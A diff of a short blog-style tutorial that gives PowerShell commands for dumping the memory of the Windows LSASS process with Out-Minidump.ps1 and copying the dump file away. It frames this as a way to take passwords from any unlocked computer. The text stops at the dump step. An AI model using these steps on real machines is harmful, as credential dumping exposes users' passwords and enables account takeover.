 Did you know that your Windows passwords are vulnerable and hackable in less than 5 minutes?

 Yep, even in Windows 10, the method is still working nicely.
 The method is not new at all.
-So, let me show how you can test with your own just by using a simple exploitation tool and a PowerShell script.
+So, let me show how you can reproduce it by using a simple exploitation tool and a PowerShell script.
 Anyone can perform this hacking when you left your computer unlocked.
-I’m not really going to explain the details, but just enough I go straight to the steps.
+I’m not really going to explain the details, just go straight to the steps.
 Google is on your fingertips if you are keen to explore more.

 Using PowerShell to perform memory dump

 To perform the LSASS dump, we will use the PowerShell script, Out-Minidump.ps1.
 The flow of cmdlet will look like this:

 .
 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1' # "dot sourcing" method to import function from the script Get-Process lsass | Out-Minidump # To perform the LSASS dump Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground' # Copy the dump file to desired location